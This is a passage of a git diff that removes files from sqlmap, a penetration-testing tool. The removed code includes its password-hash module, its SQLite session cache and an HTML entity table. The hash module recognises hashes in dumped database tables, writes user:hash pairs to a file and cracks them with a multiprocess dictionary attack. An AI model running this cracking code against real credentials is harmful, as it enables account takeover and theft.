http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/ - http://seclists.org/bugtraq/2007/Sep/304 - - >>> oracle_passwd(password='SHAlala', salt='1B7B5F82B7235E9E182C', uppercase=True) - 'S:2BFCFDF5895014EE9BB2B9BA067B01E0389BB5711B7B5F82B7235E9E182C' - """ - - binsalt = hexdecode(salt) - - retVal = "s:%s%s" % (sha1(utf8encode(password) + binsalt).hexdigest(), salt) - - return retVal.upper() if uppercase else retVal.lower() - -def oracle_old_passwd(password, username, uppercase=True): # prior to version '11g' - """ - Reference(s): - http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/ - - >>> oracle_old_passwd(password='tiger', username='scott', uppercase=True) - 'F894844C34402B67' - """ - - IV, pad = "\0" * 8, "\0" - - if isinstance(username, unicode): - username = unicode.encode(username, UNICODE_ENCODING) - - if isinstance(password, unicode): - password = unicode.encode(password, UNICODE_ENCODING) - - unistr = "".join("\0%s" % c for c in (username + password).upper()) - - cipher = des(hexdecode("0123456789ABCDEF"), CBC, IV, pad) - encrypted = cipher.encrypt(unistr) - cipher = des(encrypted[-8:], CBC, IV, pad) - encrypted = cipher.encrypt(unistr) - - retVal = hexencode(encrypted[-8:]) - - return retVal.upper() if uppercase else retVal.lower() - -def md5_generic_passwd(password, uppercase=False): - """ - >>> md5_generic_passwd(password='testpass', uppercase=False) - '179ad45c6ce2cb97cf1029e212046e81' - """ - - retVal = md5(password).hexdigest() - - return retVal.upper() if uppercase else retVal.lower() - -def sha1_generic_passwd(password, uppercase=False): - """ - >>> sha1_generic_passwd(password='testpass', uppercase=False) - '206c80413b9a96c1312cc346b7d2517b84463edd' - """ - - retVal = sha1(password).hexdigest() - - return retVal.upper() if uppercase else retVal.lower() - -def sha224_generic_passwd(password, uppercase=False): - """ - >>> sha224_generic_passwd(password='testpass', uppercase=False) - '648db6019764b598f75ab6b7616d2e82563a00eb1531680e19ac4c6f' - """ - - retVal = sha224(password).hexdigest() - - return retVal.upper() if uppercase else retVal.lower() - -def sha384_generic_passwd(password, uppercase=False): - """ - >>> sha384_generic_passwd(password='testpass', uppercase=False) - '6823546e56adf46849343be991d4b1be9b432e42ed1b4bb90635a0e4b930e49b9ca007bc3e04bf0a4e0df6f1f82769bf' - """ - - retVal = sha384(password).hexdigest() - - return retVal.upper() if uppercase else retVal.lower() - -def sha512_generic_passwd(password, uppercase=False): - """ - >>> sha512_generic_passwd(password='testpass', uppercase=False) - '78ddc8555bb1677ff5af75ba5fc02cb30bb592b0610277ae15055e189b77fe3fda496e5027a3d99ec85d54941adee1cc174b50438fdc21d82d0a79f85b58cf44' - """ - - retVal = sha512(password).hexdigest() - - return retVal.upper() if uppercase else retVal.lower() - -def crypt_generic_passwd(password, salt, uppercase=False): - """ - Reference(s): - http://docs.python.org/library/crypt.html - http://helpful.knobs-dials.com/index.php/Hashing_notes - http://php.net/manual/en/function.crypt.php - http://carey.geek.nz/code/python-fcrypt/ - - >>> crypt_generic_passwd(password='rasmuslerdorf', salt='rl', uppercase=False) - 'rl.3StKT.4T8M' - """ - - retVal = crypt(password, salt) - - return retVal.upper() if uppercase else retVal - -def wordpress_passwd(password, salt, count, prefix, uppercase=False): - """ - Reference(s): - http://packetstormsecurity.org/files/74448/phpassbrute.py.txt - http://scriptserver.mainframe8.com/wordpress_password_hasher.php - - >>> wordpress_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$9aD9ZLmkp', uppercase=False) - '$P$9aD9ZLmkpsN4A83G8MefaaP888gVKX0' - """ - - def _encode64(input_, count): - output = '' - i = 0 - - while i < count: - value = ord(input_[i]) - i += 1 - output = output + ITOA64[value & 0x3f] - - if i < count: - value = value | (ord(input_[i]) << 8) - - output = output + ITOA64[(value >> 6) & 0x3f] - - i += 1 - if i >= count: - break - - if i < count: - value = value | (ord(input_[i]) << 16) - - output = output + ITOA64[(value >> 12) & 0x3f] - - i += 1 - if i >= count: - break - - output = output + ITOA64[(value >> 18) & 0x3f] - - return output - - if isinstance(password, unicode): - password = password.encode(UNICODE_ENCODING) - - cipher = md5(salt) - cipher.update(password) - hash_ = cipher.digest() - - for i in xrange(count): - _ = md5(hash_) - _.update(password) - hash_ = _.digest() - - retVal = prefix + _encode64(hash_, 16) - - return retVal.upper() if uppercase else retVal - -__functions__ = { - HASH.MYSQL: mysql_passwd, - HASH.MYSQL_OLD: mysql_old_passwd, - HASH.POSTGRES: postgres_passwd, - HASH.MSSQL: mssql_passwd, - HASH.MSSQL_OLD: mssql_old_passwd, - HASH.MSSQL_NEW: mssql_new_passwd, - HASH.ORACLE: oracle_passwd, - HASH.ORACLE_OLD: oracle_old_passwd, - HASH.MD5_GENERIC: md5_generic_passwd, - HASH.SHA1_GENERIC: sha1_generic_passwd, - HASH.SHA224_GENERIC: sha224_generic_passwd, - HASH.SHA384_GENERIC: sha384_generic_passwd, - HASH.SHA512_GENERIC: sha512_generic_passwd, - HASH.CRYPT_GENERIC: crypt_generic_passwd, - HASH.WORDPRESS: wordpress_passwd, - } - -def storeHashesToFile(attack_dict): - if not attack_dict: - return - - if kb.storeHashesChoice is None: - message = "do you want to store hashes to a temporary file " - message += "for eventual further processing with other tools [y/N] " - test = readInput(message, default="N") - kb.storeHashesChoice = test[0] in ("y", "Y") - - if not kb.storeHashesChoice: - return - - handle, filename = tempfile.mkstemp(prefix="sqlmaphashes-", suffix=".txt") - os.close(handle) - - infoMsg = "writing hashes to a temporary file '%s' " % filename - logger.info(infoMsg) - - items = set() - - with open(filename, "w+") as f: - for user, hashes in attack_dict.items(): - for hash_ in hashes: - hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ - if hash_ and hash_ != NULL and hashRecognition(hash_): - item = None - if user and not user.startswith(DUMMY_USER_PREFIX): - item = "%s:%s\n" % (user.encode(UNICODE_ENCODING), hash_.encode(UNICODE_ENCODING)) - else: - item = "%s\n" % hash_.encode(UNICODE_ENCODING) - - if item and item not in items: - f.write(item) - items.add(item) - -def attackCachedUsersPasswords(): - if kb.data.cachedUsersPasswords: - results = dictionaryAttack(kb.data.cachedUsersPasswords) - - lut = {} - for (_, hash_, password) in results: - lut[hash_.lower()] = password - - for user in kb.data.cachedUsersPasswords.keys(): - for i in xrange(len(kb.data.cachedUsersPasswords[user])): - if (kb.data.cachedUsersPasswords[user][i] or "").strip(): - value = kb.data.cachedUsersPasswords[user][i].lower().split()[0] - if value in lut: - kb.data.cachedUsersPasswords[user][i] += "%s clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', lut[value]) - -def attackDumpedTable(): - if kb.data.dumpedTable: - table = kb.data.dumpedTable - columns = table.keys() - count = table["__infos__"]["count"] - - if not count: - return - - infoMsg = "analyzing table dump for possible password hashes" - logger.info(infoMsg) - - found = False - col_user = '' - col_passwords = set() - attack_dict = {} - - for column in columns: - if column and column.lower() in COMMON_USER_COLUMNS: - col_user = column - break - - for i in xrange(count): - if not found and i > HASH_RECOGNITION_QUIT_THRESHOLD: - break - - for column in columns: - if column == col_user or column == '__infos__': - continue - - if len(table[column]['values']) <= i: - continue - - value = table[column]['values'][i] - - if hashRecognition(value): - found = True - - if col_user and i < len(table[col_user]['values']): - if table[col_user]['values'][i] not in attack_dict: - attack_dict[table[col_user]['values'][i]] = [] - - attack_dict[table[col_user]['values'][i]].append(value) - else: - attack_dict['%s%d' % (DUMMY_USER_PREFIX, i)] = [value] - - col_passwords.add(column) - - if attack_dict: - infoMsg = "recognized possible password hashes in column%s " % ("s" if len(col_passwords) > 1 else "") - infoMsg += "'%s'" % ", ".join(col for col in col_passwords) - logger.info(infoMsg) - - storeHashesToFile(attack_dict) - - message = "do you want to crack them via a dictionary-based attack? %s" % ("[y/N/q]" if conf.multipleTargets else "[Y/n/q]") - test = readInput(message, default="N" if conf.multipleTargets else "Y") - - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - - results = dictionaryAttack(attack_dict) - lut = dict() - - for (_, hash_, password) in results: - if hash_: - lut[hash_.lower()] = password - - infoMsg = "postprocessing table dump" - logger.info(infoMsg) - - for i in xrange(count): - for column in columns: - if not (column == col_user or column == '__infos__' or len(table[column]['values']) <= i): - value = table[column]['values'][i] - - if value and value.lower() in lut: - table[column]['values'][i] += " (%s)" % lut[value.lower()] - table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i])) - -def hashRecognition(value): - retVal = None - - isOracle, isMySQL = Backend.isDbms(DBMS.ORACLE), Backend.isDbms(DBMS.MYSQL) - - if isinstance(value, basestring): - for name, regex in getPublicTypeMembers(HASH): - # Hashes for Oracle and old MySQL look the same hence these checks - if isOracle and regex == HASH.MYSQL_OLD: - continue - elif isMySQL and regex == HASH.ORACLE_OLD: - continue - elif regex == HASH.CRYPT_GENERIC: - if any((value.lower() == value, value.upper() == value)): - continue - elif re.match(regex, value): - retVal = regex - break - - return retVal - -def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist): - if IS_WIN: - coloramainit() - - count = 0 - rotator = 0 - hashes = set([item[0][1] for item in attack_info]) - - wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) - - try: - for word in wordlist: - if not attack_info: - break - - if not isinstance(word, basestring): - continue - - if suffix: - word = word + suffix - - try: - current = __functions__[hash_regex](password=word, uppercase=False) - - count += 1 - - if current in hashes: - for item in attack_info[:]: - ((user, hash_), _) = item - - if hash_ == current: - retVal.put((user, hash_, word)) - - clearConsoleLine() - - infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) - - if user and not user.startswith(DUMMY_USER_PREFIX): - infoMsg += " for user '%s'\n" % user - else: - infoMsg += " for hash '%s'\n" % hash_ - - dataToStdout(infoMsg, True) - - attack_info.remove(item) - - elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: - rotator += 1 - - if rotator >= len(ROTATING_CHARS): - rotator = 0 - - status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) - - if not hasattr(conf, "api"): - dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) - - except KeyboardInterrupt: - raise - - except (UnicodeEncodeError, UnicodeDecodeError): - pass # ignore possible encoding problems caused by some words in custom dictionaries - - except Exception, e: - warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e) - warnMsg += "Please report by e-mail to 'dev@sqlmap.org'" - logger.critical(warnMsg) - - except KeyboardInterrupt: - pass - - finally: - if hasattr(proc_count, "value"): - with proc_count.get_lock(): - proc_count.value -= 1 - -def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist): - if IS_WIN: - coloramainit() - - count = 0 - rotator = 0 - - wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) - - try: - for word in wordlist: - if found.value: - break - - current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) - count += 1 - - if not isinstance(word, basestring): - continue - - if suffix: - word = word + suffix - - try: - if hash_ == current: - if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes - word = word.upper() - - retVal.put((user, hash_, word)) - - clearConsoleLine() - - infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) - - if user and not user.startswith(DUMMY_USER_PREFIX): - infoMsg += " for user '%s'\n" % user - else: - infoMsg += " for hash '%s'\n" % hash_ - - dataToStdout(infoMsg, True) - - found.value = True - - elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0: - rotator += 1 - if rotator >= len(ROTATING_CHARS): - rotator = 0 - status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) - - if user and not user.startswith(DUMMY_USER_PREFIX): - status += ' (user: %s)' % user - - if not hasattr(conf, "api"): - dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) - - except KeyboardInterrupt: - raise - - except (UnicodeEncodeError, UnicodeDecodeError): - pass # ignore possible encoding problems caused by some words in custom dictionaries - - except Exception, e: - warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e) - warnMsg += "Please report by e-mail to 'dev@sqlmap.org'" - logger.critical(warnMsg) - - except KeyboardInterrupt: - pass - - finally: - if hasattr(proc_count, "value"): - with proc_count.get_lock(): - proc_count.value -= 1 - -def dictionaryAttack(attack_dict): - suffix_list = [""] - custom_wordlist = [""] - hash_regexes = [] - results = [] - resumes = [] - user_hash = [] - processException = False - foundHash = False - - for (_, hashes) in attack_dict.items(): - for hash_ in hashes: - if not hash_: - continue - - hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ - regex = hashRecognition(hash_) - - if regex and regex not in hash_regexes: - hash_regexes.append(regex) - infoMsg = "using hash method '%s'" % __functions__[regex].func_name - logger.info(infoMsg) - - for hash_regex in hash_regexes: - keys = set() - attack_info = [] - - for (user, hashes) in attack_dict.items(): - for hash_ in hashes: - if not hash_: - continue - - foundHash = True - hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ - - if re.match(hash_regex, hash_): - item = None - - if hash_regex not in (HASH.CRYPT_GENERIC, HASH.WORDPRESS): - hash_ = hash_.lower() - - if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): - item = [(user, hash_), {}] - elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): - item = [(user, hash_), {'username': user}] - elif hash_regex in (HASH.ORACLE,): - item = [(user, hash_), {'salt': hash_[-20:]}] - elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): - item = [(user, hash_), {'salt': hash_[6:14]}] - elif hash_regex in (HASH.CRYPT_GENERIC,): - item = [(user, hash_), {'salt': hash_[0:2]}] - elif hash_regex in (HASH.WORDPRESS,): - if ITOA64.index(hash_[3]) < 32: - item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] - else: - warnMsg = "invalid hash '%s'" % hash_ - logger.warn(warnMsg) - - if item and hash_ not in keys: - resumed = hashDBRetrieve(hash_) - if not resumed: - attack_info.append(item) - user_hash.append(item[0]) - else: - infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) - if user and not user.startswith(DUMMY_USER_PREFIX): - infoMsg += " for user '%s'" % user - logger.info(infoMsg) - resumes.append((user, hash_, resumed)) - keys.add(hash_) - - if not attack_info: - continue - - if not kb.wordlists: - while not kb.wordlists: - - # the slowest of all methods hence smaller default dict - if hash_regex in (HASH.ORACLE_OLD, HASH.WORDPRESS): - dictPaths = [paths.SMALL_DICT] - else: - dictPaths = [paths.WORDLIST] - - message = "what dictionary do you want to use?\n" - message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0] - message += "[2] custom dictionary file\n" - message += "[3] file with list of dictionary files" - choice = readInput(message, default="1") - - try: - if choice == "2": - message = "what's the custom dictionary's location?\n" - dictPaths = [readInput(message)] - - logger.info("using custom dictionary") - elif choice == "3": - message = "what's the list file location?\n" - listPath = readInput(message) - checkFile(listPath) - dictPaths = getFileItems(listPath) - - logger.info("using custom list of dictionaries") - else: - logger.info("using default dictionary") - - dictPaths = filter(None, dictPaths) - - for dictPath in dictPaths: - checkFile(dictPath) - - kb.wordlists = dictPaths - - except Exception, ex: - warnMsg = "there was a problem while loading dictionaries" - warnMsg += " ('%s')" % getSafeExString(ex) - logger.critical(warnMsg) - - message = "do you want to use common password suffixes? (slow!) [y/N] " - test = readInput(message, default="N") - - if test[0] in ("y", "Y"): - suffix_list += COMMON_PASSWORD_SUFFIXES - - infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].func_name - logger.info(infoMsg) - - for item in attack_info: - ((user, _), _) = item - if user and not user.startswith(DUMMY_USER_PREFIX): - custom_wordlist.append(normalizeUnicode(user)) - - if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): - for suffix in suffix_list: - if not attack_info or processException: - break - - if suffix: - clearConsoleLine() - infoMsg = "using suffix '%s'" % suffix - logger.info(infoMsg) - - retVal = None - processes = [] - - try: - if _multiprocessing: - if _multiprocessing.cpu_count() > 1: - infoMsg = "starting %d processes " % _multiprocessing.cpu_count() - singleTimeLogMessage(infoMsg) - - gc.disable() - - retVal = _multiprocessing.Queue() - count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) - - for i in xrange(_multiprocessing.cpu_count()): - p = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist)) - processes.append(p) - - for p in processes: - p.daemon = True - p.start() - - while count.value > 0: - time.sleep(0.5) - - else: - warnMsg = "multiprocessing hash cracking is currently " - warnMsg += "not supported on this platform" - singleTimeWarnMessage(warnMsg) - - retVal = Queue() - _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist) - - except KeyboardInterrupt: - print - processException = True - warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" - logger.warn(warnMsg) - - for process in processes: - try: - process.terminate() - process.join() - except (OSError, AttributeError): - pass - - finally: - if _multiprocessing: - gc.enable() - - if retVal: - conf.hashDB.beginTransaction() - - while not retVal.empty(): - user, hash_, word = item = retVal.get(block=False) - attack_info = filter(lambda _: _[0][0] != user or _[0][1] != hash_, attack_info) - hashDBWrite(hash_, word) - results.append(item) - - conf.hashDB.endTransaction() - - clearConsoleLine() - - else: - for ((user, hash_), kwargs) in attack_info: - if processException: - break - - if any(_[0] == user and _[1] == hash_ for _ in results): - continue - - count = 0 - found = False - - for suffix in suffix_list: - if found or processException: - break - - if suffix: - clearConsoleLine() - infoMsg = "using suffix '%s'" % suffix - logger.info(infoMsg) - - retVal = None - processes = [] - - try: - if _multiprocessing: - if _multiprocessing.cpu_count() > 1: - infoMsg = "starting %d processes " % _multiprocessing.cpu_count() - singleTimeLogMessage(infoMsg) - - gc.disable() - - retVal = _multiprocessing.Queue() - found_ = _multiprocessing.Value('i', False) - count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) - - for i in xrange(_multiprocessing.cpu_count()): - p = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist)) - processes.append(p) - - for p in processes: - p.daemon = True - p.start() - - while count.value > 0: - time.sleep(0.5) - - found = found_.value != 0 - - else: - warnMsg = "multiprocessing hash cracking is currently " - warnMsg += "not supported on this platform" - singleTimeWarnMessage(warnMsg) - - class Value(): - pass - - retVal = Queue() - found_ = Value() - found_.value = False - - _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist) - - found = found_.value - - except KeyboardInterrupt: - print - processException = True - warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" - logger.warn(warnMsg) - - for process in processes: - try: - process.terminate() - process.join() - except (OSError, AttributeError): - pass - - finally: - if _multiprocessing: - gc.enable() - - if retVal: - conf.hashDB.beginTransaction() - - while not retVal.empty(): - user, hash_, word = item = retVal.get(block=False) - hashDBWrite(hash_, word) - results.append(item) - - conf.hashDB.endTransaction() - - clearConsoleLine() - - results.extend(resumes) - - if foundHash and len(hash_regexes) == 0: - warnMsg = "unknown hash format" - logger.warn(warnMsg) - - if len(results) == 0: - warnMsg = "no clear password(s) found" - logger.warn(warnMsg) - - return results diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py deleted file mode 100644 index 44c1987f..00000000 --- a/lib/utils/hashdb.py +++ /dev/null @@ -1,194 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import hashlib -import os -import sqlite3 -import threading -import time - -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import serializeObject -from lib.core.common import singleTimeWarnMessage -from lib.core.common import unserializeObject -from lib.core.data import logger -from lib.core.exception import SqlmapDataException -from lib.core.settings import HASHDB_END_TRANSACTION_RETRIES -from lib.core.settings import HASHDB_FLUSH_RETRIES -from lib.core.settings import HASHDB_FLUSH_THRESHOLD -from lib.core.settings import UNICODE_ENCODING -from lib.core.threads import getCurrentThreadData -from lib.core.threads import getCurrentThreadName - -class HashDB(object): - def __init__(self, filepath): - self.filepath = filepath - self._write_cache = {} - self._cache_lock = threading.Lock() - - def _get_cursor(self): - threadData = getCurrentThreadData() - - if threadData.hashDBCursor is None: - try: - connection = sqlite3.connect(self.filepath, timeout=3, isolation_level=None) - threadData.hashDBCursor = connection.cursor() - threadData.hashDBCursor.execute("CREATE TABLE IF NOT EXISTS storage (id INTEGER PRIMARY KEY, value TEXT)") - connection.commit() - except Exception, ex: - errMsg = "error occurred while opening a session " - errMsg += "file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) - raise SqlmapDataException(errMsg) - - return threadData.hashDBCursor - - def _set_cursor(self, cursor): - threadData = getCurrentThreadData() - threadData.hashDBCursor = cursor - - cursor = property(_get_cursor, _set_cursor) - - def close(self): - threadData = getCurrentThreadData() - try: - if threadData.hashDBCursor: - threadData.hashDBCursor.close() - threadData.hashDBCursor.connection.close() - threadData.hashDBCursor = None - except: - pass - - @staticmethod - def hashKey(key): - key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key) - retVal = int(hashlib.md5(key).hexdigest()[:12], 16) - return retVal - - def retrieve(self, key, unserialize=False): - retVal = None - - if key and (self._write_cache or os.path.isfile(self.filepath)): - hash_ = HashDB.hashKey(key) - retVal = self._write_cache.get(hash_) - if not retVal: - while True: - try: - for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)): - retVal = row[0] - except sqlite3.OperationalError, ex: - if not any(_ in getSafeExString(ex) for _ in ("locked", "no such table")): - raise - else: - warnMsg = "problem occurred while accessing session file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) - singleTimeWarnMessage(warnMsg) - except sqlite3.DatabaseError, ex: - errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, getSafeExString(ex)) - errMsg += "If the problem persists please rerun with `--flush-session`" - raise SqlmapDataException, errMsg - else: - break - - if unserialize: - try: - retVal = unserializeObject(retVal) - except: - warnMsg = "error occurred while unserializing value for session key '%s'. " % key - warnMsg += "If the problem persists please rerun with `--flush-session`" - logger.warn(warnMsg) - - return retVal - - def write(self, key, value, serialize=False): - if key: - hash_ = HashDB.hashKey(key) - self._cache_lock.acquire() - self._write_cache[hash_] = getUnicode(value) if not serialize else serializeObject(value) - self._cache_lock.release() - - if getCurrentThreadName() in ('0', 'MainThread'): - self.flush() - - def flush(self, forced=False): - if not self._write_cache: - return - - if not forced and len(self._write_cache) < HASHDB_FLUSH_THRESHOLD: - return - - self._cache_lock.acquire() - _ = self._write_cache - self._write_cache = {} - self._cache_lock.release() - - try: - self.beginTransaction() - for hash_, value in _.items(): - retries = 0 - while True: - try: - try: - self.cursor.execute("INSERT INTO storage VALUES (?, ?)", (hash_, value,)) - except sqlite3.IntegrityError: - self.cursor.execute("UPDATE storage SET value=? WHERE id=?", (value, hash_,)) - except sqlite3.DatabaseError, ex: - if not os.path.exists(self.filepath): - debugMsg = "session file '%s' does not exist" % self.filepath - logger.debug(debugMsg) - break - - if retries == 0: - warnMsg = "there has been a problem while writing to " - warnMsg += "the session file ('%s')" % getSafeExString(ex) - logger.warn(warnMsg) - - if retries >= HASHDB_FLUSH_RETRIES: - return - else: - retries += 1 - time.sleep(1) - else: - break - finally: - self.endTransaction() - - def beginTransaction(self): - threadData = getCurrentThreadData() - if not threadData.inTransaction: - try: - self.cursor.execute("BEGIN TRANSACTION") - except: - # Reference: http://stackoverflow.com/a/25245731 - self.cursor.close() - threadData.hashDBCursor = None - self.cursor.execute("BEGIN TRANSACTION") - finally: - threadData.inTransaction = True - - def endTransaction(self): - threadData = getCurrentThreadData() - if threadData.inTransaction: - retries = 0 - while retries < HASHDB_END_TRANSACTION_RETRIES: - try: - self.cursor.execute("END TRANSACTION") - threadData.inTransaction = False - except sqlite3.OperationalError: - pass - else: - return - - retries += 1 - time.sleep(1) - - try: - self.cursor.execute("ROLLBACK TRANSACTION") - except sqlite3.OperationalError: - self.cursor.close() - self.cursor = None - finally: - threadData.inTransaction = False diff --git a/lib/utils/htmlentities.py b/lib/utils/htmlentities.py deleted file mode 100644 index 44c28044..00000000 --- a/lib/utils/htmlentities.py +++ /dev/null @@ -1,263 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -# Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html - -htmlEntities = { - 'quot': 34, - 'amp': 38, - 'lt': 60, - 'gt': 62, - 'nbsp': 160, - 'iexcl': 161, - 'cent': 162, - 'pound': 163, - 'curren': 164, - 'yen': 165, - 'brvbar': 166, - 'sect': 167, - 'uml': 168, - 'copy': 169, - 'ordf': 170, - 'laquo': 171, - 'not': 172, - 'shy': 173, - 'reg': 174, - 'macr': 175, - 'deg': 176, - 'plusmn': 177, - 'sup2': 178, - 'sup3': 179, - 'acute': 180, - 'micro': 181, - 'para': 182, - 'middot': 183, - 'cedil': 184, - 'sup1': 185, - 'ordm': 186, - 'raquo': 187, - 'frac14': 188, - 'frac12': 189, - 'frac34': 190, - 'iquest': 191, - 'Agrave': 192, - 'Aacute': 193, - 'Acirc': 194, - 'Atilde': 195, - 'Auml': 196, - 'Aring': 197, - 'AElig': 198, - 'Ccedil': 199, - 'Egrave': 200, - 'Eacute': 201, - 'Ecirc': 202, - 'Euml': 203, - 'Igrave': 204, - 'Iacute': 205, - 'Icirc': 206, - 'Iuml': 207, - 'ETH': 208, - 'Ntilde': 209, - 'Ograve': 210, - 'Oacute': 211, - 'Ocirc': 212, - 'Otilde': 213, - 'Ouml': 214, - 'times': 215, - 'Oslash': 216, - 'Ugrave': 217, - 'Uacute': 218, - 'Ucirc': 219, - 'Uuml': 220, - 'Yacute': 221, - 'THORN': 222, - 'szlig': 223, - 'agrave': 224, - 'aacute': 225, - 'acirc': 226, - 'atilde': 227, - 'auml': 228, - 'aring': 229, - 'aelig': 230, - 'ccedil': 231, - 'egrave': 232, - 'eacute': 233, - 'ecirc': 234, - 'euml': 235, - 'igrave': 236, - 'iacute': 237, - 'icirc': 238, - 'iuml': 239, - 'eth': 240, - 'ntilde': 241, - 'ograve': 242, - 'oacute': 243, - 'ocirc': 244, - 'otilde': 245, - 'ouml': 246, - 'divide': 247, - 'oslash': 248, - 'ugrave': 249, - 'uacute': 250, - 'ucirc': 251, - 'uuml': 252, - 'yacute': 253, - 'thorn': 254, - 'yuml': 255, - 'OElig': 338, - 'oelig': 339, - 'Scaron': 352, - 'fnof': 402, - 'scaron': 353, - 'Yuml': 376, - 'circ': 710, - 'tilde': 732, - 'Alpha': 913, - 'Beta': 914, - 'Gamma': 915, - 'Delta': 916, - 'Epsilon': 917, - 'Zeta': 918, - 'Eta': 919, - 'Theta': 920, - 'Iota': 921, - 'Kappa': 922, - 'Lambda': 923, - 'Mu': 924, - 'Nu': 925, - 'Xi': 926, - 'Omicron': 927, - 'Pi': 928, - 'Rho': 929, - 'Sigma': 931, - 'Tau': 932, - 'Upsilon': 933, - 'Phi': 934, - 'Chi': 935, - 'Psi': 936, - 'Omega': 937, - 'alpha': 945, - 'beta': 946, - 'gamma': 947, - 'delta': 948, - 'epsilon': 949, - 'zeta': 950, - 'eta': 951, - 'theta': 952, - 'iota': 953, - 'kappa': 954, - 'lambda': 955, - 'mu': 956, - 'nu': 957, - 'xi': 958, - 'omicron': 959, - 'pi': 960, - 'rho': 961, - 'sigmaf': 962, - 'sigma': 963, - 'tau': 964, - 'upsilon': 965, - 'phi': 966, - 'chi': 967, - 'psi': 968, - 'omega': 969, - 'thetasym': 977, - 'upsih': 978, - 'piv': 982, - 'bull': 8226, - 'hellip': 8230, - 'prime': 8242, - 'Prime': 8243, - 'oline': 8254, - 'frasl': 8260, - 'ensp': 8194, - 'emsp': 8195, - 'thinsp': 8201, - 'zwnj': 8204, - 'zwj': 8205, - 'lrm': 8206, - 'rlm': 8207, - 'ndash': 8211, - 'mdash': 8212, - 'lsquo': 8216, - 'rsquo': 8217, - 'sbquo': 8218, - 'ldquo': 8220, - 'rdquo': 8221, - 'bdquo': 8222, - 'dagger': 8224, - 'Dagger': 8225, - 'permil': 8240, - 'lsaquo': 8249, - 'rsaquo': 8250, - 'euro': 8364, - 'weierp': 8472, - 'image': 8465, - 'real': 8476, - 'trade': 8482, - 'alefsym': 8501, - 'larr': 8592, - 'uarr': 8593, - 'rarr': 8594, - 'darr': 8595, - 'harr': 8596, - 'crarr': 8629, - 'lArr': 8656, - 'uArr': 8657, - 'rArr': 8658, - 'dArr': 8659, - 'hArr': 8660, - 'forall': 8704, - 'part': 8706, - 'exist': 8707, - 'empty': 8709, - 'nabla': 8711, - 'isin': 8712, - 'notin': 8713, - 'ni': 8715, - 'prod': 8719, - 'sum': 8721, - 'minus': 8722, - 'lowast': 8727, - 'radic': 8730, - 'prop': 8733, - 'infin': 8734, - 'ang': 8736, - 'and': 8743, - 'or': 8744, - 'cap': 8745, - 'cup': 8746, - 'int': 8747, - 'there4': 8756, - 'sim': 8764, - 'cong': 8773, - 